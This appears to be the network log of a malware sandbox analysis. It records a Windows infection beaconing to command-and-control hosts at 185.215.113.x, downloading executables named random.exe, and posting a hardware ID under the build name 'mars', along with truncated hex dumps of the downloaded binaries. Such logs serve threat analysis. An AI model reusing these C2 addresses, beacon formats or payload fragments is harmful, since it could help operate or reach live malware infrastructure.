                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406795979 CET1236INData Raw: 0a 85 6a 61 82 99 52 72 ff 62 87 64 09 b8 24 0f 29 ec 43 a6 83 40 59 d2 8c b5 d0 00 49 45 85 b4 05 40 9d 91 59 36 e1 da 45 33 db fd 04 40 51 92 b9 4c 92 6e 8c 72 0c d2 3f 36 22 2e 4f ca 91 72 5d 80 cf 7d d5 40 11 66 2a b6 3c ca 7c 84 95 20 fe 56
                                                                                                                                                                                                                                                                                        Data Ascii: jaRrbd$)C@YIE@Y6E3@QLnr?6".Or]}@f*<| V&n@'jlMVcOU+~%jGNEm3^#p>aL}qb~}&x&M+Jpe@6OZrL@)@xm=e-G.B^xQ'^Rps%bx8VcO1
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406812906 CET1236INData Raw: 6d cd 12 02 2f fa 19 e8 f8 4c 84 89 85 0b 22 66 cd b2 b0 c9 44 a7 8d b0 21 da 34 cd 4c d2 0f 54 2d 9f 64 65 67 53 a9 9e fb 6d a1 78 85 6c ce 81 03 a4 11 64 bd 79 f1 cf 7c 61 93 50 ba 0e 13 66 d9 b4 30 c5 fa 4f 52 d2 04 63 cb 5d 9e 56 b1 98 21 35
                                                                                                                                                                                                                                                                                        Data Ascii: m/L"fD!4LT-degSmxldy|aPf0ORc]V!5p6cXf5&^u9f'Nw%Vq!idl](%hd~.#c%Pdpuf'On*%}'NdB@${*4T>s2dOa=Yc>+G72"2>0I
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.406825066 CET1236INData Raw: fa ec 25 58 fb 42 c6 71 95 4c c9 67 6d c5 2c 91 86 62 c7 63 61 3f 2f 62 8b 7c 16 e8 04 7e 3d 5f 45 b6 70 62 47 2d f7 93 39 b2 14 b2 4a cd 38 51 24 25 07 ca f8 a2 aa 64 8d 36 91 92 87 13 85 66 0c 96 8d ce 78 6c 61 ce 28 f9 26 62 85 0c 13 66 99 b2
                                                                                                                                                                                                                                                                                        Data Ascii: %XBqLgm,bca?/b|~=_EpbG-9J8Q$%d6fxla(&bfD!1E}@1"Os'V}]/2C`pFd5Lg$fLY\dusMOJdl}.0'SL].mU8]=YTUtK1<@L:gJ&d?%N=
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:24.411712885 CET1120INData Raw: c1 af 93 02 87 3e d6 d5 db 47 61 5f cd 7e 26 f9 26 9e f9 50 25 2f c9 32 43 cf d8 43 11 ff 97 81 2d 05 af 74 6d a0 c5 73 94 c7 86 53 82 a3 61 88 32 22 c9 45 2e 2c ba f5 f2 1d ce 19 2d 3d 35 7f 59 d7 8f c9 4a 06 3c 44 06 da 1c 39 f1 86 91 fb 80 d2
                                                                                                                                                                                                                                                                                        Data Ascii: >Ga_~&&P%/2CC-tmsSa2"E.,-=5YJ<D9=@L?<vZm/EZ5"&+)[y;qU\\pQ](e'Fz:Bj[nSU ZN5O&@mk"IELhBO[\;L(E[Sx{R4J=I1A}k


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        12192.168.2.450001185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:27.548207998 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 35 35 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1005563001&unit=246122658369
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:28.160547018 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:28 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        13192.168.2.450013185.215.113.16807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:28.887543917 CET140OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        If-Modified-Since: Mon, 11 Nov 2024 15:34:09 GMT
                                                                                                                                                                                                                                                                                        If-None-Match: "673223f1-1b8200"
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:29.515307903 CET192INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:29 GMT
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 15:34:09 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "673223f1-1b8200"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        14192.168.2.450023185.215.113.206806128C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:29.925585032 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:30.564903021 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:30 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:30.568197012 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"mars------EHDAAECAEBKJKFHJKECF--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:30.917062044 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:30 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        15192.168.2.450036185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:31.432043076 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 35 35 36 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1005564031&unit=246122658369
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.072927952 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:31 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        16192.168.2.450043185.215.113.16807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.091670990 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725733995 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:32 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 2823680
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 15:20:57 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "673220d9-2b1600"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 08 22 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ +"+`Ui` @ @.rsrc`2@.idata 8@lvwzwdeg**:@pkeeaqxp `+*@.taggant@+"*@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725758076 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725771904 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725797892 CET336INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725811005 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725824118 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725873947 CET424INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725886106 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725898027 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.725908041 CET424INData Raw: cf 1b c3 aa 7b 36 70 05 a8 6e 09 de 21 b0 cf 7c 68 27 ee 8d 94 07 15 69 0e 80 b2 96 45 77 df b9 8f 85 c7 05 43 f7 fe 2d 29 a3 0b 00 f9 5d 12 62 19 ad c3 e5 89 b1 8b 1f 03 03 0c fc 89 74 15 96 8d 45 15 0b b9 2f 2f c7 b6 a5 f9 cd 6f 6f f7 a7 75 ae
                                                                                                                                                                                                                                                                                        Data Ascii: {6pn!|h'iEwC-)]btE//oou8gE4Z(F.|]U_s]82D|LB;Z!'KsI[oHXN`Dzs.nw(zZ`
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:32.730633974 CET1236INData Raw: f2 df 89 a7 d5 a4 1d 01 6b 2d 13 14 bf a4 1a 04 4f 16 39 2a a1 ac 15 e4 f0 02 c1 8f 7a a7 50 43 89 61 e3 7d 8c a4 99 78 8c 3f bb 93 cb a4 ff 03 fa 07 d4 a5 ef a4 f3 53 c7 a4 ef 67 22 97 6c 73 8c 8f f9 da 41 57 fd 6f 53 5e d7 0a 93 2c cf 43 a7 6f
                                                                                                                                                                                                                                                                                        Data Ascii: k-O9*zPCa}x?Sg"lsAWoS^,CohAW%OFiACSkue?S_#/h{vogXiqxy:,AW;O7G84//*#'Z{)vRWq]6aX1Vh'wo


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        17192.168.2.450060185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:36.252505064 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 35 35 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1005565001&unit=246122658369
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:36.871385098 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:36 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        18192.168.2.450062185.215.113.43807692C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:38.593767881 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.238255024 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:39 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        19192.168.2.450063185.215.113.16807024C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:38.968519926 CET205OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604100943 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:39 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 1802752
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 15:34:09 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "673223f1-1b8200"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 f5 ad [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"@i@pi@M$a$ $b@.rsrc $r@.idata $r@ *$t@gcuyxxju@Ov@busnlrvl0i\@.taggant0@i"`@
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604140997 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604152918 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604165077 CET636INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604212046 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e a6 55 8c 47 91 98 10 3e 94 78 05 a7 84 55 cd 83 90 2a 3e 4a d8 a2 67 67 1d 96 65 45 39 5c a6 fe 03 06 07 4a 7c 61 01 66 9a b7 1c 7e 0b 42 7d 2f 86 16 5a 31 9a 63 f1 42 ef 51 2b af
                                                                                                                                                                                                                                                                                        Data Ascii: .UG>xU*>JggeE9\J|af~B}/Z1cBQ+HAW&}W=eY3`QO"$RQ*s@RR}8ea2LU~&MpWY2awRr8;lPA-KZ\<'zrlJ
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604223013 CET1236INData Raw: 5f 46 36 e2 e2 87 31 d1 5a 54 72 d5 8d 57 bf 5a 8b be dc d1 df 51 2f 66 be 3e 71 89 db 7f 86 4e 00 7c f5 76 87 3f 11 e8 fc 02 c8 ad 49 a0 de f6 07 d9 ff d3 35 e6 90 8d 1d d6 26 62 31 2d c0 a8 b9 54 d7 ba 7d 3d e5 e9 51 4b 97 1e f6 c6 82 67 3b da
                                                                                                                                                                                                                                                                                        Data Ascii: _F61ZTrWZQ/f>qN|v?I5&b1-T}=QKg;qe4W~%fN&*_}Q(W%j*,N&!<}!e|j}J%0`?4(H36QrSG<2C.=>cwGj'NqZq.e'H6F) e;!>{L~Q^QnR
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604237080 CET1236INData Raw: c1 1a 70 cc 03 90 17 43 2d f6 1b 96 a2 d3 4f fb fe 55 0f 5d 95 6d c6 04 2f 31 af 6d 37 c0 d4 f7 04 46 79 e0 8a 76 25 46 4d 36 86 a8 9d cd 2e d3 ff a6 fd a1 54 45 f9 45 5c d7 27 b2 ee 99 d7 6e 35 0c 09 73 05 7a 85 9b 20 6e 47 a3 f6 62 6a 8b fe 89
                                                                                                                                                                                                                                                                                        Data Ascii: pC-OU]m/1m7Fyv%FM6.TEE\'n5sz nGbjzfO/MM}:BBr]F,?-Fp)65zW"TWV&hHO2NBj3S`*-p (_v#D@Ukg&?%Z6U/:y2:DKaV(sM:p
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:39.604248047 CET36INData Raw: 89 40 fd 77 a1 3f db a1 4f f2 2e 4e fb c2 c5 81 07 86 d1 d2 e9 46 85 88 05 47 bd 91 b5 36 2c 6b 46 b9 65 e2
                                                                                                                                                                                                                                                                                        Data Ascii: @w?O.NFG6,kFe
